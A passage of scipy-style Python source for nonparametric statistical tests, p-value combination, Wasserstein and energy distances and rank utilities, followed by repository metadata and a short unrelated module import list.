bigu = u1
elif alternative == 'greater':
bigu = u2
else:
raise ValueError("alternative should be None, 'less', 'greater' "
"or 'two-sided'")
z = (bigu - meanrank) / sd
if alternative is None:
# This behavior, equal to half the size of the two-sided
# p-value, is deprecated.
p = distributions.norm.sf(abs(z))
elif alternative == 'two-sided':
p = 2 * distributions.norm.sf(abs(z))
else:
p = distributions.norm.sf(z)
u = u2
# This behavior is deprecated.
if alternative is None:
u = min(u1, u2)
return MannwhitneyuResult(u, p)
RanksumsResult = namedtuple('RanksumsResult', ('statistic', 'pvalue'))
def ranksums(x, y):
"""
Compute the Wilcoxon rank-sum statistic for two samples.
The Wilcoxon rank-sum test tests the null hypothesis that two sets
of measurements are drawn from the same distribution. The alternative
hypothesis is that values in one sample are more likely to be
larger than the values in the other sample.
This test should be used to compare two samples from continuous
distributions. It does not handle ties between measurements
in x and y. For tie-handling and an optional continuity correction
see `scipy.stats.mannwhitneyu`.
Parameters
----------
x,y : array_like
The data from the two samples.
Returns
-------
statistic : float
The test statistic under the large-sample approximation that the
rank sum statistic is normally distributed.
pvalue : float
The two-sided p-value of the test.
References
----------
.. [1] https://en.wikipedia.org/wiki/Wilcoxon_rank-sum_test
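Examples
--------
A minimal usage sketch; the samples below are illustrative only and the
result is bound to names rather than printed:
>>> from scipy import stats
>>> sample1 = [1.83, 0.50, 1.62, 2.48, 1.68, 1.88, 1.55, 3.06, 1.30]
>>> sample2 = [0.878, 0.647, 0.598, 2.05, 1.06, 1.29, 1.06, 3.14, 1.29]
>>> statistic, pvalue = stats.ranksums(sample1, sample2)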
"""
x, y = map(np.asarray, (x, y))
n1 = len(x)
n2 = len(y)
alldata = np.concatenate((x, y))
ranked = rankdata(alldata)
x = ranked[:n1]
s = np.sum(x, axis=0)
expected = n1 * (n1+n2+1) / 2.0
z = (s - expected) / np.sqrt(n1*n2*(n1+n2+1)/12.0)
prob = 2 * distributions.norm.sf(abs(z))
return RanksumsResult(z, prob)
KruskalResult = namedtuple('KruskalResult', ('statistic', 'pvalue'))
def kruskal(*args, **kwargs):
"""
Compute the Kruskal-Wallis H-test for independent samples.
The Kruskal-Wallis H-test tests the null hypothesis that the population
median of all of the groups are equal. It is a non-parametric version of
ANOVA. The test works on 2 or more independent samples, which may have
different sizes. Note that rejecting the null hypothesis does not
indicate which of the groups differs. Post hoc comparisons between
groups are required to determine which groups are different.
Parameters
----------
sample1, sample2, ... : array_like
Two or more arrays with the sample measurements can be given as
arguments.
nan_policy : {'propagate', 'raise', 'omit'}, optional
Defines how to handle when input contains nan.
The following options are available (default is 'propagate'):
* 'propagate': returns nan
* 'raise': throws an error
* 'omit': performs the calculations ignoring nan values
Returns
-------
statistic : float
The Kruskal-Wallis H statistic, corrected for ties.
pvalue : float
The p-value for the test using the assumption that H has a chi
square distribution.
See Also
--------
f_oneway : 1-way ANOVA.
mannwhitneyu : Mann-Whitney rank test on two samples.
friedmanchisquare : Friedman test for repeated measurements.
Notes
-----
Due to the assumption that H has a chi square distribution, the number
of samples in each group must not be too small. A typical rule is
that each sample must have at least 5 measurements.
References
----------
.. [1] W. H. Kruskal & W. W. Wallis, "Use of Ranks in
One-Criterion Variance Analysis", Journal of the American Statistical
Association, Vol. 47, Issue 260, pp. 583-621, 1952.
.. [2] https://en.wikipedia.org/wiki/Kruskal-Wallis_one-way_analysis_of_variance
Examples
--------
>>> from scipy import stats
>>> x = [1, 3, 5, 7, 9]
>>> y = [2, 4, 6, 8, 10]
>>> stats.kruskal(x, y)
KruskalResult(statistic=0.2727272727272734, pvalue=0.6015081344405895)
>>> x = [1, 1, 1]
>>> y = [2, 2, 2]
>>> z = [2, 2]
>>> stats.kruskal(x, y, z)
KruskalResult(statistic=7.0, pvalue=0.0301973834223185)
"""
args = list(map(np.asarray, args))
num_groups = len(args)
if num_groups < 2:
raise ValueError("Need at least two groups in stats.kruskal()")
for arg in args:
if arg.size == 0:
return KruskalResult(np.nan, np.nan)
n = np.asarray(list(map(len, args)))
if 'nan_policy' in kwargs.keys():
if kwargs['nan_policy'] not in ('propagate', 'raise', 'omit'):
raise ValueError("nan_policy must be 'propagate', "
"'raise' or'omit'")
else:
nan_policy = kwargs['nan_policy']
else:
nan_policy = 'propagate'
contains_nan = False
for arg in args:
cn = _contains_nan(arg, nan_policy)
if cn[0]:
contains_nan = True
break
if contains_nan and nan_policy == 'omit':
    args = [ma.masked_invalid(a) for a in args]
    return mstats_basic.kruskal(*args)
if contains_nan and nan_policy == 'propagate':
return KruskalResult(np.nan, np.nan)
alldata = np.concatenate(args)
ranked = rankdata(alldata)
ties = tiecorrect(ranked)
if ties == 0:
raise ValueError('All numbers are identical in kruskal')
# Compute sum^2/n for each group and sum
j = np.insert(np.cumsum(n), 0, 0)
ssbn = 0
for i in range(num_groups):
ssbn += _square_of_sums(ranked[j[i]:j[i+1]]) / n[i]
totaln = np.sum(n, dtype=float)
h = 12.0 / (totaln * (totaln + 1)) * ssbn - 3 * (totaln + 1)
df = num_groups - 1
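# Apply the tie correction to the H statistic.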
h /= ties
return KruskalResult(h, distributions.chi2.sf(h, df))
FriedmanchisquareResult = namedtuple('FriedmanchisquareResult',
('statistic', 'pvalue'))
def friedmanchisquare(*args):
"""
Compute the Friedman test for repeated measurements.
The Friedman test tests the null hypothesis that repeated measurements of
the same individuals have the same distribution. It is often used
to test for consistency among measurements obtained in different ways.
For example, if two measurement techniques are used on the same set of
individuals, the Friedman test can be used to determine if the two
measurement techniques are consistent.
Parameters
----------
measurements1, measurements2, measurements3... : array_like
Arrays of measurements. All of the arrays must have the same number
of elements. At least 3 sets of measurements must be given.
Returns
-------
statistic : float
The test statistic, correcting for ties.
pvalue : float
The associated p-value assuming that the test statistic has a chi
squared distribution.
Notes
-----
Due to the assumption that the test statistic has a chi squared
distribution, the p-value is only reliable for n > 10 and more than
6 repeated measurements.
References
----------
.. [1] https://en.wikipedia.org/wiki/Friedman_test
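Examples
--------
A minimal usage sketch; the measurement arrays are illustrative only and
the result is bound to names rather than printed:
>>> from scipy import stats
>>> before = [72, 96, 88, 92, 74, 76, 82]
>>> midway = [120, 120, 132, 120, 101, 96, 112]
>>> after = [76, 95, 104, 96, 84, 72, 76]
>>> statistic, pvalue = stats.friedmanchisquare(before, midway, after)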
"""
k = len(args)
if k < 3:
raise ValueError('Less than 3 levels. Friedman test not appropriate.')
n = len(args[0])
for i in range(1, k):
if len(args[i]) != n:
raise ValueError('Unequal N in friedmanchisquare. Aborting.')
# Rank data
data = np.vstack(args).T
data = data.astype(float)
for i in range(len(data)):
data[i] = rankdata(data[i])
# Handle ties
ties = 0
for i in range(len(data)):
replist, repnum = find_repeats(array(data[i]))
for t in repnum:
ties += t * (t*t - 1)
c = 1 - ties / (k*(k*k - 1)*n)
ssbn = np.sum(data.sum(axis=0)**2)
chisq = (12.0 / (k*n*(k+1)) * ssbn - 3*n*(k+1)) / c
return FriedmanchisquareResult(chisq, distributions.chi2.sf(chisq, k - 1))
BrunnerMunzelResult = namedtuple('BrunnerMunzelResult',
('statistic', 'pvalue'))
def brunnermunzel(x, y, alternative="two-sided", distribution="t",
nan_policy='propagate'):
"""
Compute the Brunner-Munzel test on samples x and y.
The Brunner-Munzel test is a nonparametric test of the null hypothesis that
when values are taken one by one from each group, the probabilities of
getting large values in both groups are equal.
Unlike the Wilcoxon-Mann-Whitney U test, this does not require the
assumption of equal variances in the two groups. Note that it does not
assume that the distributions are the same. This test works on two independent samples,
which may have different sizes.
Parameters
----------
x, y : array_like
Array of samples, should be one-dimensional.
alternative : {'two-sided', 'less', 'greater'}, optional
Defines the alternative hypothesis.
The following options are available (default is 'two-sided'):
* 'two-sided'
* 'less': one-sided
* 'greater': one-sided
distribution : {'t', 'normal'}, optional
Defines how to get the p-value.
The following options are available (default is 't'):
* 't': get the p-value by t-distribution
* 'normal': get the p-value by standard normal distribution.
nan_policy : {'propagate', 'raise', 'omit'}, optional
Defines how to handle when input contains nan.
The following options are available (default is 'propagate'):
* 'propagate': returns nan
* 'raise': throws an error
* 'omit': performs the calculations ignoring nan values
Returns
-------
statistic : float
The Brunner-Munzel W statistic.
pvalue : float
p-value assuming a t distribution. One-sided or
two-sided, depending on the choice of `alternative` and `distribution`.
See Also
--------
mannwhitneyu : Mann-Whitney rank test on two samples.
Notes
-----
Brunner and Munzel recommend estimating the p-value by the t-distribution
when the size of the data is 50 or less. If the size is lower than 10, it is
better to use the permuted Brunner-Munzel test (see [2]_).
References
----------
.. [1] Brunner, E. and Munzel, U. "The nonparametric Behrens-Fisher
problem: Asymptotic theory and a small-sample approximation".
Biometrical Journal. Vol. 42(2000): 17-25.
.. [2] Neubert, K. and Brunner, E. "A studentized permutation test for the
non-parametric Behrens-Fisher problem". Computational Statistics and
Data Analysis. Vol. 51(2007): 5192-5204.
Examples
--------
>>> from scipy import stats
>>> x1 = [1,2,1,1,1,1,1,1,1,1,2,4,1,1]
>>> x2 = [3,3,4,3,1,2,3,1,1,5,4]
>>> w, p_value = stats.brunnermunzel(x1, x2)
>>> w
3.1374674823029505
>>> p_value
0.0057862086661515377
"""
x = np.asarray(x)
y = np.asarray(y)
# check both x and y
cnx, npx = _contains_nan(x, nan_policy)
cny, npy = _contains_nan(y, nan_policy)
contains_nan = cnx or cny
if npx == "omit" or npy == "omit":
nan_policy = "omit"
if contains_nan and nan_policy == "propagate":
return BrunnerMunzelResult(np.nan, np.nan)
elif contains_nan and nan_policy == "omit":
x = ma.masked_invalid(x)
y = ma.masked_invalid(y)
return mstats_basic.brunnermunzel(x, y, alternative, distribution)
nx = len(x)
ny = len(y)
if nx == 0 or ny == 0:
return BrunnerMunzelResult(np.nan, np.nan)
rankc = rankdata(np.concatenate((x, y)))
rankcx = rankc[0:nx]
rankcy = rankc[nx:nx+ny]
rankcx_mean = np.mean(rankcx)
rankcy_mean = np.mean(rankcy)
rankx = rankdata(x)
ranky = rankdata(y)
rankx_mean = np.mean(rankx)
ranky_mean = np.mean(ranky)
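# Sx and Sy estimate the variances of the placements (combined ranks minus
# within-sample ranks), as used in the Brunner-Munzel statistic.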
Sx = np.sum(np.power(rankcx - rankx - rankcx_mean + rankx_mean, 2.0))
Sx /= nx - 1
Sy = np.sum(np.power(rankcy - ranky - rankcy_mean + ranky_mean, 2.0))
Sy /= ny - 1
wbfn = nx * ny * (rankcy_mean - rankcx_mean)
wbfn /= (nx + ny) * np.sqrt(nx * Sx + ny * Sy)
if distribution == "t":
df_numer = np.power(nx * Sx + ny * Sy, 2.0)
df_denom = np.power(nx * Sx, 2.0) / (nx - 1)
df_denom += np.power(ny * Sy, 2.0) / (ny - 1)
df = df_numer / df_denom
p = distributions.t.cdf(wbfn, df)
elif distribution == "normal":
p = distributions.norm.cdf(wbfn)
else:
raise ValueError(
"distribution should be 't' or 'normal'")
if alternative == "greater":
pass
elif alternative == "less":
p = 1 - p
elif alternative == "two-sided":
p = 2 * np.min([p, 1-p])
else:
raise ValueError(
"alternative should be 'less', 'greater' or 'two-sided'")
return BrunnerMunzelResult(wbfn, p)
def combine_pvalues(pvalues, method='fisher', weights=None):
"""
Combine p-values from independent tests bearing upon the same hypothesis.
Parameters
----------
pvalues : array_like, 1-D
Array of p-values assumed to come from independent tests.
method : {'fisher', 'pearson', 'tippett', 'stouffer', 'mudholkar_george'}, optional
Name of method to use to combine p-values.
The following methods are available (default is 'fisher'):
* 'fisher': Fisher's method (Fisher's combined probability test), the
sum of the logarithm of the p-values
* 'pearson': Pearson's method (similar to Fisher's but uses sum of the
complement of the p-values inside the logarithms)
* 'tippett': Tippett's method (minimum of p-values)
* 'stouffer': Stouffer's Z-score method
* 'mudholkar_george': the difference of Fisher's and Pearson's methods
divided by 2
weights : array_like, 1-D, optional
Optional array of weights used only for Stouffer's Z-score method.
Returns
-------
statistic: float
The statistic calculated by the specified method.
pval: float
The combined p-value.
Notes
-----
Fisher's method (also known as Fisher's combined probability test) [1]_ uses
a chi-squared statistic to compute a combined p-value. The closely related
Stouffer's Z-score method [2]_ uses Z-scores rather than p-values. The
advantage of Stouffer's method is that it is straightforward to introduce
weights, which can make Stouffer's method more powerful than Fisher's
method when the p-values are from studies of different size [6]_ [7]_.
Pearson's method uses :math:`log(1-p_i)` inside the sum whereas Fisher's
method uses :math:`log(p_i)` [4]_. For Fisher's and Pearson's methods, the
sum of the logarithms is multiplied by -2 in the implementation, and this
quantity has a chi-square distribution that determines the p-value. The
`mudholkar_george` method is based on the difference of Fisher's and
Pearson's test statistics, each of which includes a -2 factor [4]_;
however, the `mudholkar_george` statistic implemented here omits these -2
factors. The test statistic of `mudholkar_george` is the sum of logistic
random variables, and equation 3.6 in [3]_ is used to approximate the
p-value based on Student's t-distribution.
Fisher's method may be extended to combine p-values from dependent tests
[5]_. Extensions such as Brown's method and Kost's method are not currently
implemented.
.. versionadded:: 0.15.0
References
----------
.. [1] https://en.wikipedia.org/wiki/Fisher%27s_method
.. [2] https://en.wikipedia.org/wiki/Fisher%27s_method#Relation_to_Stouffer.27s_Z-score_method
.. [3] George, E. O., and G. S. Mudholkar. "On the convolution of logistic
random variables." Metrika 30.1 (1983): 1-13.
.. [4] Heard, N. and Rubin-Delanchey, P. "Choosing between methods of
combining p-values." Biometrika 105.1 (2018): 239-246.
.. [5] Whitlock, M. C. "Combining probability from independent tests: the
weighted Z-method is superior to Fisher's approach." Journal of
Evolutionary Biology 18, no. 5 (2005): 1368-1373.
.. [6] Zaykin, Dmitri V. "Optimally weighted Z-test is a powerful method
for combining probabilities in meta-analysis." Journal of
Evolutionary Biology 24, no. 8 (2011): 1836-1841.
.. [7] https://en.wikipedia.org/wiki/Extensions_of_Fisher%27s_method
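Examples
--------
A minimal usage sketch; the p-values below are illustrative only and the
result is bound to names rather than printed:
>>> from scipy.stats import combine_pvalues
>>> statistic, pval = combine_pvalues([0.01, 0.20, 0.30], method='fisher')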
"""
pvalues = np.asarray(pvalues)
if pvalues.ndim != 1:
raise ValueError("pvalues is not 1-D")
if method == 'fisher':
statistic = -2 * np.sum(np.log(pvalues))
pval = distributions.chi2.sf(statistic, 2 * len(pvalues))
elif method == 'pearson':
statistic = -2 * np.sum(np.log1p(-pvalues))
pval = distributions.chi2.sf(statistic, 2 * len(pvalues))
elif method == 'mudholkar_george':
statistic = -np.sum(np.log(pvalues)) + np.sum(np.log1p(-pvalues))
nu = 5 * len(pvalues) + 4
approx_factor = np.sqrt(nu / (nu - 2))
pval = distributions.t.sf(statistic * approx_factor, nu)
elif method == 'tippett':
statistic = np.min(pvalues)
pval = distributions.beta.sf(statistic, 1, len(pvalues))
elif method == 'stouffer':
if weights is None:
weights = np.ones_like(pvalues)
elif len(weights) != len(pvalues):
raise ValueError("pvalues and weights must be of the same size.")
weights = np.asarray(weights)
if weights.ndim != 1:
raise ValueError("weights is not 1-D")
Zi = distributions.norm.isf(pvalues)
statistic = np.dot(weights, Zi) / np.linalg.norm(weights)
pval = distributions.norm.sf(statistic)
else:
raise ValueError(
    "Invalid method %r. Options are 'fisher', 'pearson', "
    "'mudholkar_george', 'tippett', or 'stouffer'." % method)
return (statistic, pval)
#####################################
# STATISTICAL DISTANCES #
#####################################
def wasserstein_distance(u_values, v_values, u_weights=None, v_weights=None):
r"""
Compute the first Wasserstein distance between two 1D distributions.
This distance is also known as the earth mover's distance, since it can be
seen as the minimum amount of "work" required to transform :math:`u` into
:math:`v`, where "work" is measured as the amount of distribution weight
that must be moved, multiplied by the distance it has to be moved.
.. versionadded:: 1.0.0
Parameters
----------
u_values, v_values : array_like
Values observed in the (empirical) distribution.
u_weights, v_weights : array_like, optional
Weight for each value. If unspecified, each value is assigned the same
weight.
`u_weights` (resp. `v_weights`) must have the same length as
`u_values` (resp. `v_values`). If the weight sum differs from 1, it
must still be positive and finite so that the weights can be normalized
to sum to 1.
Returns
-------
distance : float
The computed distance between the distributions.
Notes
-----
The first Wasserstein distance between the distributions :math:`u` and
:math:`v` is:
.. math::
l_1 (u, v) = \inf_{\pi \in \Gamma (u, v)} \int_{\mathbb{R} \times
\mathbb{R}} |x-y| \mathrm{d} \pi (x, y)
where :math:`\Gamma (u, v)` is the set of (probability) distributions on
:math:`\mathbb{R} \times \mathbb{R}` whose marginals are :math:`u` and
:math:`v` on the first and second factors respectively.
If :math:`U` and :math:`V` are the respective CDFs of :math:`u` and
:math:`v`, this distance also equals to:
.. math::
l_1(u, v) = \int_{-\infty}^{+\infty} |U-V|
See [2]_ for a proof of the equivalence of both definitions.
The input distributions can be empirical, therefore coming from samples
whose values are effectively inputs of the function, or they can be seen as
generalized functions, in which case they are weighted sums of Dirac delta
functions located at the specified values.
References
----------
.. [1] "Wasserstein metric", https://en.wikipedia.org/wiki/Wasserstein_metric
.. [2] Ramdas, Garcia, Cuturi "On Wasserstein Two Sample Testing and Related
Families of Nonparametric Tests" (2015). :arXiv:`1509.02237`.
Examples
--------
>>> from scipy.stats import wasserstein_distance
>>> wasserstein_distance([0, 1, 3], [5, 6, 8])
5.0
>>> wasserstein_distance([0, 1], [0, 1], [3, 1], [2, 2])
0.25
>>> wasserstein_distance([3.4, 3.9, 7.5, 7.8], [4.5, 1.4],
... [1.4, 0.9, 3.1, 7.2], [3.2, 3.5])
4.0781331438047861
"""
return _cdf_distance(1, u_values, v_values, u_weights, v_weights)
def energy_distance(u_values, v_values, u_weights=None, v_weights=None):
r"""
Compute the energy distance between two 1D distributions.
.. versionadded:: 1.0.0
Parameters
----------
u_values, v_values : array_like
Values observed in the (empirical) distribution.
u_weights, v_weights : array_like, optional
Weight for each value. If unspecified, each value is assigned the same
weight.
`u_weights` (resp. `v_weights`) must have the same length as
`u_values` (resp. `v_values`). If the weight sum differs from 1, it
must still be positive and finite so that the weights can be normalized
to sum to 1.
Returns
-------
distance : float
The computed distance between the distributions.
Notes
-----
The energy distance between two distributions :math:`u` and :math:`v`, whose
    respective CDFs are :math:`U` and :math:`V`, equals:
.. math::
D(u, v) = \left( 2\mathbb E|X - Y| - \mathbb E|X - X'| -
\mathbb E|Y - Y'| \right)^{1/2}
where :math:`X` and :math:`X'` (resp. :math:`Y` and :math:`Y'`) are
independent random variables whose probability distribution is :math:`u`
(resp. :math:`v`).
As shown in [2]_, for one-dimensional real-valued variables, the energy
distance is linked to the non-distribution-free version of the Cramer-von
Mises distance:
.. math::
D(u, v) = \sqrt{2} l_2(u, v) = \left( 2 \int_{-\infty}^{+\infty} (U-V)^2
\right)^{1/2}
Note that the common Cramer-von Mises criterion uses the distribution-free
version of the distance. See [2]_ (section 2), for more details about both
versions of the distance.
The input distributions can be empirical, therefore coming from samples
whose values are effectively inputs of the function, or they can be seen as
generalized functions, in which case they are weighted sums of Dirac delta
functions located at the specified values.
References
----------
.. [1] "Energy distance", https://en.wikipedia.org/wiki/Energy_distance
.. [2] Szekely "E-statistics: The energy of statistical samples." Bowling
Green State University, Department of Mathematics and Statistics,
Technical Report 02-16 (2002).
.. [3] Rizzo, Szekely "Energy distance." Wiley Interdisciplinary Reviews:
Computational Statistics, 8(1):27-38 (2015).
.. [4] Bellemare, Danihelka, Dabney, Mohamed, Lakshminarayanan, Hoyer,
Munos "The Cramer Distance as a Solution to Biased Wasserstein
Gradients" (2017). :arXiv:`1705.10743`.
Examples
--------
>>> from scipy.stats import energy_distance
>>> energy_distance([0], [2])
2.0000000000000004
>>> energy_distance([0, 8], [0, 8], [3, 1], [2, 2])
1.0000000000000002
>>> energy_distance([0.7, 7.4, 2.4, 6.8], [1.4, 8. ],
... [2.1, 4.2, 7.4, 8. ], [7.6, 8.8])
0.88003340976158217
"""
return np.sqrt(2) * _cdf_distance(2, u_values, v_values,
u_weights, v_weights)
def _cdf_distance(p, u_values, v_values, u_weights=None, v_weights=None):
r"""
Compute, between two one-dimensional distributions :math:`u` and
:math:`v`, whose respective CDFs are :math:`U` and :math:`V`, the
statistical distance that is defined as:
.. math::
l_p(u, v) = \left( \int_{-\infty}^{+\infty} |U-V|^p \right)^{1/p}
p is a positive parameter; p = 1 gives the Wasserstein distance, p = 2
gives the energy distance.
Parameters
----------
u_values, v_values : array_like
Values observed in the (empirical) distribution.
u_weights, v_weights : array_like, optional
Weight for each value. If unspecified, each value is assigned the same
weight.
`u_weights` (resp. `v_weights`) must have the same length as
`u_values` (resp. `v_values`). If the weight sum differs from 1, it
must still be positive and finite so that the weights can be normalized
to sum to 1.
Returns
-------
distance : float
The computed distance between the distributions.
Notes
-----
The input distributions can be empirical, therefore coming from samples
whose values are effectively inputs of the function, or they can be seen as
generalized functions, in which case they are weighted sums of Dirac delta
functions located at the specified values.
References
----------
.. [1] Bellemare, Danihelka, Dabney, Mohamed, Lakshminarayanan, Hoyer,
Munos "The Cramer Distance as a Solution to Biased Wasserstein
Gradients" (2017). :arXiv:`1705.10743`.
"""
u_values, u_weights = _validate_distribution(u_values, u_weights)
v_values, v_weights = _validate_distribution(v_values, v_weights)
u_sorter = np.argsort(u_values)
v_sorter = np.argsort(v_values)
all_values = np.concatenate((u_values, v_values))
all_values.sort(kind='mergesort')
# Compute the differences between pairs of successive values of u and v.
deltas = np.diff(all_values)
# Get the respective positions of the values of u and v among the values of
# both distributions.
u_cdf_indices = u_values[u_sorter].searchsorted(all_values[:-1], 'right')
v_cdf_indices = v_values[v_sorter].searchsorted(all_values[:-1], 'right')
# Calculate the CDFs of u and v using their weights, if specified.
if u_weights is None:
u_cdf = u_cdf_indices / u_values.size
else:
u_sorted_cumweights = np.concatenate(([0],
np.cumsum(u_weights[u_sorter])))
u_cdf = u_sorted_cumweights[u_cdf_indices] / u_sorted_cumweights[-1]
if v_weights is None:
v_cdf = v_cdf_indices / v_values.size
else:
v_sorted_cumweights = np.concatenate(([0],
np.cumsum(v_weights[v_sorter])))
v_cdf = v_sorted_cumweights[v_cdf_indices] / v_sorted_cumweights[-1]
# Compute the value of the integral based on the CDFs.
# If p = 1 or p = 2, we avoid using np.power, which introduces an overhead
# of about 15%.
if p == 1:
return np.sum(np.multiply(np.abs(u_cdf - v_cdf), deltas))
if p == 2:
return np.sqrt(np.sum(np.multiply(np.square(u_cdf - v_cdf), deltas)))
return np.power(np.sum(np.multiply(np.power(np.abs(u_cdf - v_cdf), p),
deltas)), 1/p)
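# Hedged consistency check, not part of the original module: for the sample
# data below the p = 1 branch reproduces the wasserstein_distance docstring
# value of 5.0, and multiplying the p = 2 branch by sqrt(2) reproduces
# energy_distance, mirroring the wrappers defined above.
def _example_cdf_distance():
    u, v = [0.0, 1.0, 3.0], [5.0, 6.0, 8.0]
    l1 = _cdf_distance(1, u, v)      # == wasserstein_distance(u, v) == 5.0
    l2 = _cdf_distance(2, u, v)
    return l1, l2, np.sqrt(2) * l2   # last value == energy_distance(u, v)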
def _validate_distribution(values, weights):
"""
Validate the values and weights from a distribution input of `cdf_distance`
and return them as ndarray objects.
Parameters
----------
values : array_like
Values observed in the (empirical) distribution.
weights : array_like
Weight for each value.
Returns
-------
values : ndarray
Values as ndarray.
weights : ndarray
Weights as ndarray.
"""
# Validate the value array.
values = np.asarray(values, dtype=float)
if len(values) == 0:
raise ValueError("Distribution can't be empty.")
# Validate the weight array, if specified.
if weights is not None:
weights = np.asarray(weights, dtype=float)
if len(weights) != len(values):
raise ValueError('Value and weight array-likes for the same '
'empirical distribution must be of the same size.')
if np.any(weights < 0):
raise ValueError('All weights must be non-negative.')
if not 0 < np.sum(weights) < np.inf:
raise ValueError('Weight array-like sum must be positive and '
'finite. Set as None for an equal distribution of '
'weight.')
return values, weights
return values, None
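# Hedged illustration, not part of the original module: _validate_distribution
# only checks the weights, it does not normalize them, so both calls below
# describe the same empirical distribution.  Normalization happens later in
# _cdf_distance, where cumulative weights are divided by their total.
def _example_validate_distribution():
    values_a, weights_a = _validate_distribution([0.0, 1.0], [2.0, 2.0])
    values_b, weights_b = _validate_distribution([0.0, 1.0], [0.5, 0.5])
    return (values_a, weights_a), (values_b, weights_b)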
#####################################
# SUPPORT FUNCTIONS #
#####################################
RepeatedResults = namedtuple('RepeatedResults', ('values', 'counts'))
def find_repeats(arr):
"""
Find repeats and repeat counts.
Parameters
----------
arr : array_like
Input array. This is cast to float64.
Returns
-------
values : ndarray
The unique values from the (flattened) input that are repeated.
counts : ndarray
Number of times the corresponding 'value' is repeated.
Notes
-----
In numpy >= 1.9 `numpy.unique` provides similar functionality. The main
difference is that `find_repeats` only returns repeated values.
Examples
--------
>>> from scipy import stats
>>> stats.find_repeats([2, 1, 2, 3, 2, 2, 5])
RepeatedResults(values=array([2.]), counts=array([4]))
>>> stats.find_repeats([[10, 20, 1, 2], [5, 5, 4, 4]])
RepeatedResults(values=array([4., 5.]), counts=array([2, 2]))
"""
# Note: always copies.
return RepeatedResults(*_find_repeats(np.array(arr, dtype=np.float64)))
def _sum_of_squares(a, axis=0):
"""
Square each element of the input array, and return the sum(s) of that.
Parameters
----------
a : array_like
Input array.
axis : int or None, optional
Axis along which to calculate. Default is 0. If None, compute over
the whole array `a`.
Returns
-------
sum_of_squares : ndarray
The sum along the given axis for (a**2).
See Also
--------
_square_of_sums : The square(s) of the sum(s) (the opposite of
`_sum_of_squares`).
"""
a, axis = _chk_asarray(a, axis)
return np.sum(a*a, axis)
def _square_of_sums(a, axis=0):
"""
Sum elements of the input array, and return the square(s) of that sum.
Parameters
----------
a : array_like
Input array.
axis : int or None, optional
Axis along which to calculate. Default is 0. If None, compute over
the whole array `a`.
Returns
-------
square_of_sums : float or ndarray
The square of the sum over `axis`.
See Also
--------
_sum_of_squares : The sum of squares (the opposite of `square_of_sums`).
"""
a, axis = _chk_asarray(a, axis)
s = np.sum(a, axis)
if not np.isscalar(s):
return s.astype(float) * s
else:
return float(s) * s
def rankdata(a, method='average'):
"""
Assign ranks to data, dealing with ties appropriately.
Ranks begin at 1. The `method` argument controls how ranks are assigned
to equal values. See [1]_ for further discussion of ranking methods.
Parameters
----------
a : array_like
The array of values to be ranked. The array is first flattened.
method : {'average', 'min', 'max', 'dense', 'ordinal'}, optional
The method used to assign ranks to tied elements.
The following methods are available (default is 'average'):
* 'average': The average of the ranks that would have been assigned to
all the tied values is assigned to each value.
* 'min': The minimum of the ranks that would have been assigned to all
the tied values is assigned to each value. (This is also
referred to as "competition" ranking.)
* 'max': The maximum of the ranks that would have been assigned to all
the tied values is assigned to each value.
* 'dense': Like 'min', but the rank of the next highest element is
assigned the rank immediately after those assigned to the tied
elements.
* 'ordinal': All values are given a distinct rank, corresponding to
the order that the values occur in `a`.
Returns
-------
ranks : ndarray
An array of length equal to the size of `a`, containing rank
scores.
References
----------
.. [1] "Ranking", https://en.wikipedia.org/wiki/Ranking
Examples
--------
>>> from scipy.stats import rankdata
>>> rankdata([0, 2, 3, 2])
array([ 1. , 2.5, 4. , 2.5])
>>> rankdata([0, 2, 3, 2], method='min')
array([ 1, 2, 4, 2])
>>> rankdata([0, 2, 3, 2], method='max')
array([ 1, 3, 4, 3])
>>> rankdata([0, 2, 3, 2], method='dense')
array([ 1, 2, 3, 2])
>>> rankdata([0, 2, 3, 2], method='ordinal')
array([ 1, 2, 4, 3])
"""
if method not in ('average', 'min', 'max', 'dense', 'ordinal'):
raise ValueError('unknown method "{0}"'.format(method))
arr = np.ravel(np.asarray(a))
algo = 'mergesort' if method == 'ordinal' else 'quicksort'
sorter = np.argsort(arr, kind=algo)
inv = np.empty(sorter.size, dtype=np.intp)
inv[sorter] = np.arange(sorter.size, dtype=np.intp)
if method == 'ordinal':
return inv + 1
arr = arr[sorter]
obs = np.r_[True, arr[1:] != arr[:-1]]
dense = obs.cumsum()[inv]
if method == 'dense':
return dense
# cumulative counts of each unique value
count = np.r_[np.nonzero(obs)[0], len(obs)]
if method == 'max':
return count[dense]
if method == 'min':
return count[dense - 1] + 1
# average method
return .5 * (count[dense] + count[dense - 1] + 1)
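def _example_rankdata_internals():
    """Hedged walk-through, not part of the original module: reproduce the
    intermediate arrays rankdata builds for a = [0, 2, 3, 2] so the final
    'min'/'max'/'average' expressions above are easy to follow."""
    arr = np.ravel(np.asarray([0, 2, 3, 2]))
    sorter = np.argsort(arr, kind='quicksort')
    inv = np.empty(sorter.size, dtype=np.intp)
    inv[sorter] = np.arange(sorter.size, dtype=np.intp)
    arr = arr[sorter]                            # [0, 2, 2, 3]
    obs = np.r_[True, arr[1:] != arr[:-1]]       # [True, True, False, True]
    dense = obs.cumsum()[inv]                    # [1, 2, 3, 2]
    count = np.r_[np.nonzero(obs)[0], len(obs)]  # [0, 1, 3, 4]
    # 'max'     -> count[dense]         == [1, 3, 4, 3]
    # 'min'     -> count[dense - 1] + 1 == [1, 2, 4, 2]
    # 'average' -> .5 * (max + min)     == [1.0, 2.5, 4.0, 2.5]
    return dense, count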
|
{
"content_hash": "f2b2df75c803adcc8858811c94449070",
"timestamp": "",
"source": "github",
"line_count": 7389,
"max_line_length": 119,
"avg_line_length": 34.7559886317499,
"alnum_prop": 0.6026860115570923,
"repo_name": "jamestwebber/scipy",
"id": "2a8d7540d6fe05beb6dbab32d85dc3ef0e15e689",
"size": "257732",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "scipy/stats/stats.py",
"mode": "33188",
"license": "bsd-3-clause",
"language": [
{
"name": "C",
"bytes": "4398425"
},
{
"name": "C++",
"bytes": "649746"
},
{
"name": "Dockerfile",
"bytes": "1291"
},
{
"name": "Fortran",
"bytes": "5368529"
},
{
"name": "MATLAB",
"bytes": "4346"
},
{
"name": "Makefile",
"bytes": "778"
},
{
"name": "Python",
"bytes": "12779698"
},
{
"name": "Shell",
"bytes": "538"
},
{
"name": "TeX",
"bytes": "52106"
}
],
"symlink_target": ""
}
|
import project
import company
import report
import wizard
import res_partner
import res_config
# vim:expandtab:smartindent:tabstop=4:softtabstop=4:shiftwidth=4:
|
{
"content_hash": "8cf6e338e1e292896bfc918ca470abc5",
"timestamp": "",
